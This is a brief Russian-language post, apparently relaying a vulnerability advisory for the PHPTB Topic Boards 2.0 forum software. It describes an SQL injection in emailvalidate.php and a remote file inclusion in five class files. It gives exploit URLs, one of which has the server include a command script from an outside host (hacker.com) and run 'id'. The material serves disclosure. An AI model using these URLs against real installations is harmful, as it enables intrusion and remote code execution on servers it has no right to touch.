Интересная уязвимость обнаружена aLMaSTeR HaCKeR, в форуме PHPTB Topic Boards 2.0.
Уязвимый скрипт: emailvalidate.php
Рабочий пример
http://пример.com/phptb/index.php?act=emailvalidate&mid=[sql]
Кроме этой уязвимости, http://www.securityfocus.com сообщает о возможности внешнего инклуда через файлы:
/classes/admin_o.php
/classes/board_o.php
/classes/dev_o.php
/classes/file_o.php
/classes/tech_o.php
Реальный вариант атаки:
http://пример.com/phptb/classes/admin_o.php?absolutepath=http://hacker.com/cmd.txt?cmd=id